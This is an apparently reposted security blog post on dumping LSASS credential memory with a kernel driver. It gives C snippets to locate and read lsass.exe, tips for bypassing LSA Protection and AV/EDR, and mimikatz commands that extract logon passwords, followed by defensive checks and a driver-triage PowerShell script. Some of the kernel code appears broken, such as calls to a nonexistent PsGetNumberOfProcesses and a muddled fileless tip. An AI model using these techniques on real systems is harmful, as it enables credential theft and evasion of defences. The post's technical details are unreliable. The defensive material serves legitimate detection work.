
LSASS (Local Security Authority Subsystem Service) is a prime target for attackers due to its storage of sensitive credentials. Traditional user-mode dumping methods are often detected by security solutions, especially when LSA Protection is enabled. This article explores a kernel-mode approach to bypass these protections.
Kernel-Mode LSASS Dumping Steps
1. Create a System Thread:
NTSTATUS status = PsCreateSystemThread(&hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, DumpLsassThread, NULL);
2. Locate LSASS Process:
PEPROCESS GetLsassProcess() {
PEPROCESS Process = NULL;
for (ULONG i = 0; i < PsGetNumberOfProcesses(); i++) {
Process = PsGetNextProcess(Process);
if (strstr(PsGetProcessImageFileName(Process), "lsass.exe")) {
return Process;
}
}
return NULL;
}
3. Attach to LSASS:
KeStackAttachProcess(TargetProcess, &ApcState);
4. Dump Memory Pages:
ZwQueryVirtualMemory(ProcessHandle, BaseAddress, MemoryBasicInformation, &MBI, sizeof(MBI), NULL);
ZwWriteFile(FileHandle, NULL, NULL, NULL, &IoStatus, Buffer, Size, NULL, NULL);
You Should Know:
- LSA Protection Bypass: Kernel-mode techniques ignore `RunAsPPL` (Protected Process Light) since they operate at a higher privilege level.
- Detection Evasion: No user-mode API calls (e.g., MiniDumpWriteDump) are used, reducing AV/EDR visibility.
- Fileless Alternative: Use `ZwAllocateVirtualMemory` + `ZwMapViewOfSection` to avoid writing to disk.
Defensive Measures
- Monitor Kernel Drivers:
Get-WmiObject Win32_SystemDriver | Where-Object { $_.State -eq "Running" } | Select-Object Name, Path
- Enable Kernel-Mode Audit:
auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
- Restrict Driver Loading:
bcdedit /set {current} driverloadpolicy high
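Building on the driver-enumeration one-liner above, here is an added defender-side triage script (not part of the original post): it lists running kernel drivers whose image is unsigned, has a broken signature, or loads from outside %SystemRoot%\System32, and then reports whether LSA Protection (RunAsPPL) and HVCI are active. It assumes Windows PowerShell 5.1 or later, run as administrator.

```powershell
# Added example, not from the original post. Assumes Windows PowerShell 5.1+ run as administrator.
function Resolve-DriverPath([string]$PathName) {
    # Win32_SystemDriver.PathName often carries NT-style prefixes; normalise to a Win32 path.
    $p = $PathName -replace '^\\\?\?\\', ''
    $p = $p -replace '^\\SystemRoot', $env:SystemRoot
    $p = $p -replace '^System32', "$env:SystemRoot\System32"
    return $p
}

function Get-SuspiciousDriver {
    $trustedDir = Join-Path $env:SystemRoot 'System32'
    foreach ($d in Get-CimInstance Win32_SystemDriver | Where-Object State -eq 'Running') {
        if (-not $d.PathName) { continue }   # pseudo-drivers with no on-disk image
        $path = Resolve-DriverPath $d.PathName
        $sig  = if (Test-Path $path) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        $status  = if ($sig) { $sig.Status.ToString() } else { 'FileMissing' }
        $outside = -not $path.StartsWith($trustedDir, [StringComparison]::OrdinalIgnoreCase)
        if ($status -ne 'Valid' -or $outside) {
            [pscustomobject]@{
                Name            = $d.Name
                Path            = $path
                Signature       = $status
                Signer          = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
                OutsideSystem32 = $outside
            }
        }
    }
}

Get-SuspiciousDriver | Format-Table -AutoSize

# RunAsPPL = 1 means LSA Protection is on. Kernel code ignores it, as the post notes,
# but it still stops the common user-mode dumpers, so verify it is set.
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
$ppl = if ($null -eq $lsa.RunAsPPL) { 'not set (LSA Protection off)' } else { $lsa.RunAsPPL }
"RunAsPPL: $ppl"

# HVCI blocks unsigned/untrusted kernel code. SecurityServicesRunning contains 2 when it is active.
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
"HVCI running: $([bool]($dg.SecurityServicesRunning -contains 2))"
```

Treat the output as a triage list, not a verdict: validly signed third-party drivers under Program Files are common, so the entries worth a closer look are those with a non-Valid signature or an unfamiliar signer.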
What Undercode Says
Kernel-mode exploitation is a double-edged sword: powerful for attackers but detectable with proper telemetry. Defenders must prioritize:
- Hypervisor-Protected Code Integrity (HVCI) to block unsigned drivers.
- Kernel Callback Hooks (e.g., ObRegisterCallbacks) to detect process manipulation.
- LSASS Memory Signing (experimental) to prevent unauthorized reads.
Expected Output:
A `C:\dump.dmp` file containing LSASS memory, usable with Mimikatz or Pypykatz:
mimikatz sekurlsa::minidump C:\dump.dmp
mimikatz sekurlsa::logonPasswords
Prediction
Kernel-mode attacks will evolve to exploit Windows Subsystem for Linux (WSL) and Hyper-V interfaces, requiring cross-layer defense strategies.
For training, see: Evasion Lab (CETP) or contact [email protected].
Reported By: Saad Ahla – Hackers Feeds